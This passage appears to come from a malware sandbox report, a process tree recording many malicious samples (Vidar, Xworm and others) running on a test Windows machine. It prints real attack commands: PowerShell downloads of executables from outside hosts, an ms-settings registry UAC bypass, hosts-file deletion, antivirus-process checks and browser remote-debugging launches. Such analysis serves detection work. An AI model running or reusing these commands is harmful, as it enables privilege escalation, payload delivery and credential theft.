        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2104,i,10763641423199328590,6850282840084274619,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2420 /prefetch:8
        5⤵
        
        PID:7740
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3100,i,10763641423199328590,6850282840084274619,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3204 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:7924
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,10763641423199328590,6850282840084274619,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3236 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:7912
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4492,i,10763641423199328590,6850282840084274619,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4564 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:8200
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4704,i,10763641423199328590,6850282840084274619,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4804 /prefetch:8
        5⤵
        
        PID:852
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4464,i,10763641423199328590,6850282840084274619,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4964 /prefetch:2
        5⤵
        
        PID:5428
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=5000,i,10763641423199328590,6850282840084274619,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4976 /prefetch:2
        5⤵
        
        PID:7252
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:7428
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ffa71d146f8,0x7ffa71d14708,0x7ffa71d14718
        5⤵
        
        PID:7408
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,17291457328533330927,2351681933734708464,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
        5⤵
        
        PID:8328
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,17291457328533330927,2351681933734708464,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
        5⤵
        
        PID:8344
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,17291457328533330927,2351681933734708464,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:8
        5⤵
        
        PID:1108
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,17291457328533330927,2351681933734708464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:8784
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,17291457328533330927,2351681933734708464,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:8660
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,17291457328533330927,2351681933734708464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3052 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:6680
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,17291457328533330927,2351681933734708464,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5364
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FIIECFHDBAAE" & exit
      4⤵
      PID:3136
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:7852
- - C:\Users\Admin\Desktop\a\gvndxfghs.exe
    "C:\Users\Admin\Desktop\a\gvndxfghs.exe"
    3⤵
    PID:8140
  - - C:\Users\Admin\Desktop\a\gvndxfghs.exe
      C:\Users\Admin\Desktop\a\gvndxfghs.exe
      4⤵
      PID:8824
  - - C:\Users\Admin\Desktop\a\gvndxfghs.exe
      C:\Users\Admin\Desktop\a\gvndxfghs.exe
      4⤵
      PID:8836
  - - C:\Users\Admin\Desktop\a\gvndxfghs.exe
      C:\Users\Admin\Desktop\a\gvndxfghs.exe
      4⤵
      PID:8856
- - C:\Users\Admin\Desktop\a\random.exe
    "C:\Users\Admin\Desktop\a\random.exe"
    3⤵
    PID:9096
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9096 -s 1444
      4⤵
      Program crash
      PID:8472
- - C:\Users\Admin\Desktop\a\unik.exe
    "C:\Users\Admin\Desktop\a\unik.exe"
    3⤵
    PID:7216
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7216 -s 1424
      4⤵
      Program crash
      PID:6756
- - C:\Users\Admin\Desktop\a\xblkpfZ8Y4.exe
    "C:\Users\Admin\Desktop\a\xblkpfZ8Y4.exe"
    3⤵
    PID:8148
- - C:\Users\Admin\Desktop\a\test28.exe
    "C:\Users\Admin\Desktop\a\test28.exe"
    3⤵
    PID:7456
- - C:\Users\Admin\Desktop\a\test26.exe
    "C:\Users\Admin\Desktop\a\test26.exe"
    3⤵
    PID:2896
- - C:\Users\Admin\Desktop\a\test27.exe
    "C:\Users\Admin\Desktop\a\test27.exe"
    3⤵
    PID:8336
- - C:\Users\Admin\Desktop\a\test29.exe
    "C:\Users\Admin\Desktop\a\test29.exe"
    3⤵
    PID:8532
- - C:\Users\Admin\Desktop\a\test25.exe
    "C:\Users\Admin\Desktop\a\test25.exe"
    3⤵
    PID:8884
- - C:\Users\Admin\Desktop\a\test24.exe
    "C:\Users\Admin\Desktop\a\test24.exe"
    3⤵
    PID:5192
- - C:\Users\Admin\Desktop\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe
    "C:\Users\Admin\Desktop\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe"
    3⤵
    PID:7496
- - C:\Users\Admin\Desktop\a\main_v4.exe
    "C:\Users\Admin\Desktop\a\main_v4.exe"
    3⤵
    PID:5988
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:6004
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe
      4⤵
      Kills process with taskkill
      PID:5860
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get Caption,Version
      4⤵
      PID:4584
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get InstallDate
      4⤵
      PID:7264
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [CultureInfo]::InstalledUICulture.Name
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3472
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic cpu get Name,NumberOfCores,NumberOfLogicalProcessors,Manufacturer
      4⤵
      PID:7524
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic memorychip get Capacity
      4⤵
      PID:7224
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic path win32_videocontroller get Name
      4⤵
      Detects videocard installed
      PID:7348
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:2788
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:8080
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:9076
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe
      4⤵
      Kills process with taskkill
      PID:7600
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get Caption,Version
      4⤵
      PID:6568
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get InstallDate
      4⤵
      PID:7676
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [CultureInfo]::InstalledUICulture.Name
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4576
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic cpu get Name,NumberOfCores,NumberOfLogicalProcessors,Manufacturer
      4⤵
      PID:2592
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic memorychip get Capacity
      4⤵
      PID:7052
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic path win32_videocontroller get Name
      4⤵
      Detects videocard installed
      PID:8304
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:9008
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:4012
- - C:\Users\Admin\Desktop\a\TikTok18.exe
    "C:\Users\Admin\Desktop\a\TikTok18.exe"
    3⤵
    PID:5964
  - - C:\Users\Admin\AppData\Local\Temp\e60cdd3\TikTok18.exe
      run=1 shortcut="C:\Users\Admin\Desktop\a\TikTok18.exe"
      4⤵
      PID:1492
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c .\TikTok18.bat
        5⤵
        
        PID:8748
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/1/downloads/papa_hr_build.exe', 'C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe')";
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:228
- - C:\Users\Admin\Desktop\a\papa_hr_build.exe
    "C:\Users\Admin\Desktop\a\papa_hr_build.exe"
    3⤵
    PID:9088
  - - C:\Users\Admin\Desktop\a\papa_hr_build.exe
      "C:\Users\Admin\Desktop\a\papa_hr_build.exe"
      4⤵
      PID:7628
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9088 -s 340
      4⤵
      Program crash
      PID:7524
- - C:\Users\Admin\Desktop\a\fHR9z2C.exe
    "C:\Users\Admin\Desktop\a\fHR9z2C.exe"
    3⤵
    PID:3556
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:8432
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:7656
  - - C:\Windows\system32\cmd.exe
      /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\9243.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      PID:2528
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\9243.vbs" /f
        5⤵
        
        PID:8592
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        5⤵
        
        PID:4776
  - - C:\Windows\system32\cmd.exe
      /c start /B ComputerDefaults.exe
      4⤵
      PID:7972
    - - C:\Windows\system32\ComputerDefaults.exe
        
        ComputerDefaults.exe
        5⤵
        
        PID:8908
      - C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\9243.vbs
        6⤵
        
        PID:8912
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
        7⤵
        
        PID:8504
  - - C:\Windows\system32\cmd.exe
      /c del /f C:\Users\Admin\AppData\Local\Temp\9243.vbs
      4⤵
      PID:8660
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:8044
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:8632
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:4212
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:8744
  - - C:\Windows\system32\cmd.exe
      /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\1223.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      PID:7352
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\1223.vbs" /f
        5⤵
        
        PID:8736
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        5⤵
        
        PID:8468
  - - C:\Windows\system32\cmd.exe
      /c start /B ComputerDefaults.exe
      4⤵
      PID:8976
    - - C:\Windows\system32\ComputerDefaults.exe
        
        ComputerDefaults.exe
        5⤵
        
        PID:8524
      - C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\1223.vbs
        6⤵
        
        PID:8056
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp
        7⤵
        
        PID:3856
  - - C:\Windows\system32\cmd.exe
      /c del /f C:\Users\Admin\AppData\Local\Temp\1223.vbs
      4⤵
      PID:8640
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:3248
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:3152
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:9144
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:9192
  - - C:\Windows\system32\cmd.exe
      /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\1565.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      PID:7996
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\1565.vbs" /f
        5⤵
        
        PID:8548
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        5⤵
        
        PID:760
  - - C:\Windows\system32\cmd.exe
      /c start /B ComputerDefaults.exe
      4⤵
      PID:1960
    - - C:\Windows\system32\ComputerDefaults.exe
        
        ComputerDefaults.exe
        5⤵
        
        PID:5068
      - C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\1565.vbs
        6⤵
        
        PID:5724
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" interface ip set dns "Ethernet" dhcp
        7⤵
        
        PID:5904
  - - C:\Windows\system32\cmd.exe
      /c del /f C:\Users\Admin\AppData\Local\Temp\1565.vbs
      4⤵
      PID:1468
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:7336
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:7308
- - C:\Users\Admin\Desktop\a\AmLzNi.exe
    "C:\Users\Admin\Desktop\a\AmLzNi.exe"
    3⤵
    PID:5500
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7784
- - C:\Users\Admin\Desktop\a\Xworm%20V5.6.exe
    "C:\Users\Admin\Desktop\a\Xworm%20V5.6.exe"
    3⤵
    PID:5732
- - C:\Users\Admin\Desktop\a\XClient.exe
    "C:\Users\Admin\Desktop\a\XClient.exe"
    3⤵
    PID:7384
- - C:\Users\Admin\Desktop\a\VBVEd6f.exe
    "C:\Users\Admin\Desktop\a\VBVEd6f.exe"
    3⤵
    PID:6668
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy Appreciate Appreciate.cmd && Appreciate.cmd
      4⤵
      PID:7768
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:5628
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        5⤵
        
        PID:7792
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:7664
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        5⤵
        
        PID:3588
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 397506
        5⤵
        
        PID:8756
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Concept + ..\Mix + ..\Trunk + ..\Answers + ..\Bufing + ..\Benefits + ..\Ram + ..\Guides k
        5⤵
        
        PID:7812
    - - C:\Users\Admin\AppData\Local\Temp\397506\Mesa.com
        
        Mesa.com k
        5⤵
        
        PID:8184
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        
        PID:2516
- - C:\Users\Admin\Desktop\a\test12.exe
    "C:\Users\Admin\Desktop\a\test12.exe"
    3⤵
    PID:8012
- - C:\Users\Admin\Desktop\a\test6.exe
    "C:\Users\Admin\Desktop\a\test6.exe"
    3⤵
    PID:8144
- - C:\Users\Admin\Desktop\a\test14.exe
    "C:\Users\Admin\Desktop\a\test14.exe"
    3⤵
    PID:8932
- - C:\Users\Admin\Desktop\a\pantest.exe
    "C:\Users\Admin\Desktop\a\pantest.exe"
    3⤵
    PID:8308
- - C:\Users\Admin\Desktop\a\test9.exe
    "C:\Users\Admin\Desktop\a\test9.exe"
    3⤵
    PID:7796
- - C:\Users\Admin\Desktop\a\test10-29.exe
    "C:\Users\Admin\Desktop\a\test10-29.exe"
    3⤵
    PID:8140
- - C:\Users\Admin\Desktop\a\test19.exe
    "C:\Users\Admin\Desktop\a\test19.exe"
    3⤵
    PID:8348
- - C:\Users\Admin\Desktop\a\test10.exe
    "C:\Users\Admin\Desktop\a\test10.exe"
    3⤵
    PID:8888
- - C:\Users\Admin\Desktop\a\test_again4.exe
    "C:\Users\Admin\Desktop\a\test_again4.exe"
    3⤵
    PID:8776
- - C:\Users\Admin\Desktop\a\test23.exe
    "C:\Users\Admin\Desktop\a\test23.exe"
    3⤵
    PID:7412
- - C:\Users\Admin\Desktop\a\test5.exe
    "C:\Users\Admin\Desktop\a\test5.exe"
    3⤵
    PID:8976
- - C:\Users\Admin\Desktop\a\test11.exe
    "C:\Users\Admin\Desktop\a\test11.exe"
    3⤵
    PID:8084
- - C:\Users\Admin\Desktop\a\test20.exe
    "C:\Users\Admin\Desktop\a\test20.exe"
    3⤵
    PID:7024
- - C:\Users\Admin\Desktop\a\test_again3.exe
    "C:\Users\Admin\Desktop\a\test_again3.exe"
    3⤵
    PID:4576
- - C:\Users\Admin\Desktop\a\test16.exe
    "C:\Users\Admin\Desktop\a\test16.exe"
    3⤵
    PID:9200
- - C:\Users\Admin\Desktop\a\test13.exe
    "C:\Users\Admin\Desktop\a\test13.exe"
    3⤵
    PID:6804
- - C:\Users\Admin\Desktop\a\test_again2.exe
    "C:\Users\Admin\Desktop\a\test_again2.exe"
    3⤵
    PID:7640
- - C:\Users\Admin\Desktop\a\test15.exe
    "C:\Users\Admin\Desktop\a\test15.exe"
    3⤵
    PID:2692
- - C:\Users\Admin\Desktop\a\test18.exe
    "C:\Users\Admin\Desktop\a\test18.exe"
    3⤵
    PID:7388
- - C:\Users\Admin\Desktop\a\test21.exe
    "C:\Users\Admin\Desktop\a\test21.exe"
    3⤵
    PID:8384
- - C:\Users\Admin\Desktop\a\test22.exe
    "C:\Users\Admin\Desktop\a\test22.exe"
    3⤵
    PID:5700
- - C:\Users\Admin\Desktop\a\test8.exe
    "C:\Users\Admin\Desktop\a\test8.exe"
    3⤵
    PID:7600
- - C:\Users\Admin\Desktop\a\test7.exe
    "C:\Users\Admin\Desktop\a\test7.exe"
    3⤵
    PID:8148
- - C:\Users\Admin\Desktop\a\test-again.exe
    "C:\Users\Admin\Desktop\a\test-again.exe"
    3⤵
    PID:5452
- - C:\Users\Admin\Desktop\a\test17.exe
    "C:\Users\Admin\Desktop\a\test17.exe"
    3⤵
    PID:7324
- - C:\Users\Admin\Desktop\a\vg9qcBa.exe
    "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
    3⤵
    PID:8496
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8356
- - C:\Users\Admin\Desktop\a\win.exe
    "C:\Users\Admin\Desktop\a\win.exe"
    3⤵
    PID:332
  - - C:\Windows\SysWOW64\route.exe
      route print
      4⤵
      PID:8260
  - - C:\Windows\SysWOW64\arp.exe
      arp -a 10.127.0.1
      4⤵
      Network Service Discovery
      PID:5356
- - C:\Users\Admin\Desktop\a\cbchr.exe
    "C:\Users\Admin\Desktop\a\cbchr.exe"
    3⤵
    PID:8468
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:8196
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8468 -s 1168
      4⤵
      Program crash
      PID:9016
- - C:\Users\Admin\Desktop\a\FaceBuild.exe
    "C:\Users\Admin\Desktop\a\FaceBuild.exe"
    3⤵
    PID:5516
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:1272
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe
      4⤵
      Kills process with taskkill
      PID:7276
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get Caption,Version
      4⤵
      PID:5428
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get InstallDate
      4⤵
      PID:5904
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [CultureInfo]::InstalledUICulture.Name
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3156
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic cpu get Name,NumberOfCores,NumberOfLogicalProcessors,Manufacturer
      4⤵
      PID:3424
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic memorychip get Capacity
      4⤵
      PID:8028
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic path win32_videocontroller get Name
      4⤵
      Detects videocard installed
      PID:7124
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:7696
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:4512
- C:\Users\Admin\Desktop\4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4352
- - C:\Users\Admin\Desktop\Files\vidar.exe
    "C:\Users\Admin\Desktop\Files\vidar.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Modifies system certificate store
    - Suspicious use of SetWindowsHookEx
    PID:4680
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\Files\vidar.exe" & rd /s /q "C:\ProgramData\IJEGHJECFCFC" & exit
      4⤵
